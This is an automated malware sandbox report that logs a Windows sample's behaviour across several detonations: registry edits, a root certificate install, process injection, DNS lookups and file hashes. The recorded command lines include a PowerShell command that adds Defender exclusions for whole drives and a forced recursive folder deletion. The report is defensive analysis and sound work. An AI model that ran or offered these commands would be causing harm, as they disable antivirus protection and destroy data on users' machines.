| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2204-10-0x0000029B69E70000-0x0000029B69E92000-memory.dmp
memory/2204-11-0x0000029B69F40000-0x0000029B69F50000-memory.dmp
memory/2204-9-0x00007FFDF9A00000-0x00007FFDFA4C1000-memory.dmp
memory/2204-12-0x0000029B69F40000-0x0000029B69F50000-memory.dmp
memory/2204-13-0x0000029B69F40000-0x0000029B69F50000-memory.dmp
memory/2204-16-0x00007FFDF9A00000-0x00007FFDFA4C1000-memory.dmp
Analysis: behavioral26
Detonation Overview
Submitted
2024-02-28 18:15
Reported
2024-02-28 18:29
Platform
win10v2004-20240226-en
Max time kernel
109s
Max time network
439s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-609813121-2907144057-1731107329-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe | N/A |
Enumerates physical storage devices
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = (binary blob data omitted) | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = (binary blob data omitted) | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = (binary blob data omitted) | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = (binary blob data omitted) | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2188 wrote to memory of 1016 | N/A | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 2188 wrote to memory of 1016 | N/A | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 2188 wrote to memory of 1016 | N/A | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 2188 wrote to memory of 636 | N/A | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 2188 wrote to memory of 636 | N/A | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 2188 wrote to memory of 636 | N/A | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe | C:\Windows\SysWOW64\cmd.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath $env:ProgramData, $env:AppData, $env:SystemDrive\ "
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /K rd /s /q "C:\Users\Admin\AppData\Roaming\services" & EXIT
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 177.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.73.42.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
Files
memory/1016-1-0x0000000072C10000-0x00000000733C0000-memory.dmp
memory/1016-0-0x0000000005420000-0x0000000005456000-memory.dmp
memory/1016-3-0x0000000005550000-0x0000000005560000-memory.dmp
memory/1016-2-0x0000000005550000-0x0000000005560000-memory.dmp
memory/1016-4-0x0000000005B90000-0x00000000061B8000-memory.dmp
memory/1016-5-0x0000000005B20000-0x0000000005B42000-memory.dmp
memory/1016-6-0x00000000062C0000-0x0000000006326000-memory.dmp
memory/1016-7-0x00000000063A0000-0x0000000006406000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ebnrarrs.bxr.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1016-17-0x00000000065E0000-0x0000000006934000-memory.dmp
memory/1016-18-0x00000000069E0000-0x00000000069FE000-memory.dmp
memory/1016-19-0x0000000006A30000-0x0000000006A7C000-memory.dmp
memory/1016-20-0x0000000005550000-0x0000000005560000-memory.dmp
memory/1016-21-0x000000007F680000-0x000000007F690000-memory.dmp
memory/1016-22-0x0000000006FB0000-0x0000000006FE2000-memory.dmp
memory/1016-23-0x000000006F550000-0x000000006F59C000-memory.dmp
memory/1016-33-0x0000000006F90000-0x0000000006FAE000-memory.dmp
memory/1016-34-0x0000000007BC0000-0x0000000007C63000-memory.dmp
memory/1016-35-0x0000000008350000-0x00000000089CA000-memory.dmp
memory/1016-36-0x0000000007D00000-0x0000000007D1A000-memory.dmp
memory/1016-37-0x0000000007D70000-0x0000000007D7A000-memory.dmp
memory/1016-38-0x0000000007FC0000-0x0000000008056000-memory.dmp
memory/1016-39-0x0000000007EF0000-0x0000000007F01000-memory.dmp
memory/1016-40-0x0000000007F30000-0x0000000007F3E000-memory.dmp
memory/1016-41-0x0000000007F60000-0x0000000007F74000-memory.dmp
memory/1016-42-0x0000000007FA0000-0x0000000007FBA000-memory.dmp
memory/1016-43-0x0000000007F90000-0x0000000007F98000-memory.dmp
memory/1016-46-0x0000000072C10000-0x00000000733C0000-memory.dmp
Analysis: behavioral32
Detonation Overview
Submitted
2024-02-28 18:15
Reported
2024-02-28 18:25
Platform
win10v2004-20240226-en
Max time kernel
89s
Max time network
216s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\data\BLAKEX64.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 18.53.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 182.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.73.42.20.in-addr.arpa | udp |
Files
Analysis: behavioral11
Detonation Overview
Submitted
2024-02-28 18:15
Reported
2024-02-28 18:24
Platform
win7-20240220-en
Max time kernel
117s
Max time network
124s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\AppInfo\Xfh5GWnGPMjT.ps1
Network
Files
memory/2872-4-0x000000001B5E0000-0x000000001B8C2000-memory.dmp
memory/2872-5-0x0000000002790000-0x0000000002798000-memory.dmp
memory/2872-6-0x000007FEF5B40000-0x000007FEF64DD000-memory.dmp
memory/2872-7-0x00000000029C0000-0x0000000002A40000-memory.dmp
memory/2872-8-0x000007FEF5B40000-0x000007FEF64DD000-memory.dmp
memory/2872-9-0x00000000029C0000-0x0000000002A40000-memory.dmp
memory/2872-10-0x00000000029C0000-0x0000000002A40000-memory.dmp
memory/2872-11-0x000007FEF5B40000-0x000007FEF64DD000-memory.dmp
Analysis: behavioral14
Detonation Overview
Submitted
2024-02-28 18:15
Reported
2024-02-28 18:24
Platform
win10v2004-20240226-en
Max time kernel
129s
Max time network
168s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\AppInfo\YwTGpGD7UtG1.ps1
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x508 0x304
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 173.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 182.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 179.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.193.132.51.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ju2xhn0c.pin.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3768-0-0x00000261793E0000-0x0000026179402000-memory.dmp
memory/3768-10-0x00007FFA039B0000-0x00007FFA04471000-memory.dmp
memory/3768-11-0x0000026179460000-0x0000026179470000-memory.dmp
memory/3768-12-0x0000026179460000-0x0000026179470000-memory.dmp
memory/3768-15-0x00007FFA039B0000-0x00007FFA04471000-memory.dmp
Analysis: behavioral19
Detonation Overview
Submitted
2024-02-28 18:15
Reported
2024-02-28 18:24
Platform
win7-20240221-en
Max time kernel
120s
Max time network
144s
Command Line
Signatures
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\Launhcer.exe
"C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\Launhcer.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "$AdminRightsRequired = $true function Get-Win { while ($true) { # if ($AdminRightsRequired) { # try { Start-Process -FilePath '.\data\Launcher.exe' -Verb RunAs -Wait # break } catch { Write-Host 'Error 0xc0000906' } } else { # break } } } Get-Win"
C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath $env:ProgramData, $env:AppData, $env:SystemDrive\ "
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /K rd /s /q "C:\Users\Admin\AppData\Roaming\services" & EXIT
Network
Files
memory/2876-0-0x00000000000E0000-0x00000000000E1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Cab2010.tmp
| MD5 | ac05d27423a85adc1622c714f2cb6184 |
| SHA1 | b0fe2b1abddb97837ea0195be70ab2ff14d43198 |
| SHA256 | c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d |
| SHA512 | 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d |
C:\Users\Admin\AppData\Local\Temp\Tar2023.tmp
| MD5 | 9c0c641c06238516f27941aa1166d427 |
| SHA1 | 64cd549fb8cf014fcd9312aa7a5b023847b6c977 |
| SHA256 | 4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f |
| SHA512 | 936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
| MD5 | 753df6889fd7410a2e9fe333da83a429 |
| SHA1 | 3c425f16e8267186061dd48ac1c77c122962456e |
| SHA256 | b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78 |
| SHA512 | 9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444 |
C:\Users\Admin\AppData\Local\Temp\Tar24CF.tmp
| MD5 | dd73cead4b93366cf3465c8cd32e2796 |
| SHA1 | 74546226dfe9ceb8184651e920d1dbfb432b314e |
| SHA256 | a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22 |
| SHA512 | ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63 |
memory/2868-77-0x0000000072DA0000-0x000000007334B000-memory.dmp
memory/2868-78-0x0000000072DA0000-0x000000007334B000-memory.dmp
memory/2868-79-0x0000000000300000-0x0000000000340000-memory.dmp
memory/2868-81-0x0000000000300000-0x0000000000340000-memory.dmp
memory/2868-102-0x0000000000300000-0x0000000000340000-memory.dmp
memory/1424-173-0x0000000000160000-0x0000000000161000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 08cf339d5ef943459b0a54846745db83 |
| SHA1 | eb206fafaf1dd09b40ff9d5517e881c238a6d3a2 |
| SHA256 | e9f91f3e65e42ba1832ac0af77ceaf761cda2c925a69ac84f5f610f31ee49da5 |
| SHA512 | a41096bed79ac14567152ff408a28f38dfa78d3a24497a262603b436d46c2aac066df6b7fcd97b538c700b3425126cfadfffab9572e0954540b9d13a495e41a2 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | 6fa8924728509d77424e759804abccb7 |
| SHA1 | fd4bf1afb94e6789491f0b608ea5f281ee5e201a |
| SHA256 | a920ace5c2fe8914bb9b2118dae20b86ff17255c86323824aa39a7505e0e0241 |
| SHA512 | b67bca50b243b2472d4df86f855e80383f6c78bf903ed11341932e65de0d17fc458263a055f5583f27f4311d1059aac071f0b2677e3d7834121a6734875d99d0 |
memory/1708-225-0x0000000072DA0000-0x000000007334B000-memory.dmp
memory/1708-234-0x0000000002490000-0x00000000024D0000-memory.dmp
memory/1708-292-0x0000000072DA0000-0x000000007334B000-memory.dmp
memory/2868-336-0x0000000072DA0000-0x000000007334B000-memory.dmp
memory/2868-337-0x0000000000300000-0x0000000000340000-memory.dmp
memory/2868-338-0x0000000000300000-0x0000000000340000-memory.dmp
memory/2868-340-0x0000000072DA0000-0x000000007334B000-memory.dmp
Analysis: behavioral21
Detonation Overview
Submitted
2024-02-28 18:15
Reported
2024-02-28 18:24
Platform
win7-20240221-en
Max time kernel
120s
Max time network
133s
Command Line
Signatures
Modifies system executable filetype association
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR32 | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR32\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
Enumerates physical storage devices
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\ContextMenuHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\WinRAR | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.REV | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\DropHandler | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\DragDropHandlers\WinRAR32 | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR32\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\DropHandler\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\ContextMenuHandlers | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\WinRAR32 | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\WinRAR32 | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\WinRAR32 | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\DragDropHandlers\WinRAR | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shell\open\command | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\data\\AppInfo\\services\\WinRAR.exe,0" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\DropHandler\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\ShellEx\ContextMenuHandlers\WinRAR\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\WinRAR\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shell\open | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\WinRAR32\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR32 | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
